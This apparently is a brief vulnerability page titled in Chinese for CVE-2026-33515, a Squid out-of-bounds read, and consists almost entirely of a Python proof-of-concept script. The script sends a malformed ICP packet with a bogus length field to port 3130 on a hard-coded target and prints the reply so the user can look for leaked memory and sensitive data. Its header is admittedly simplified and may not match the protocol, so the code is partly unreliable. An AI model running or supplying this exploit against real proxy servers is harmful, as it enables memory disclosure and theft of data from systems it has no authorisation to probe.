CVE-2026-33515 Squid越界读取漏洞

import socket import struct # PoC for CVE-2026-33515: Squid ICP Out-of-bounds Read # This script sends a malformed ICP packet to trigger the vulnerability. TARGET_IP = "192.168.1.100" ICP_PORT = 3130 # Default ICP port def create_malformed_icp_packet(): # ICP Header structure (simplified) # opcode, version, length, number, timestamp ... # Sending a crafted packet with invalid length to trigger OOB read header = struct.pack("!BBHI", 2, 3, 0xFFFF, 1) # Opcode 2 (QUERY), Invalid length payload = b"A" * 50 return header + payload def send_exploit(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) payload = create_malformed_icp_packet() sock.sendto(payload, (TARGET_IP, ICP_PORT)) print(f"[+] Malformed ICP packet sent to {TARGET_IP}:{ICP_PORT}") # Wait for response (might contain memory leak) data, addr = sock.recvfrom(1024) print(f"[+] Received response from {addr}: {data.hex()}") print("[+] Check memory dump in response for sensitive data.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": send_exploit()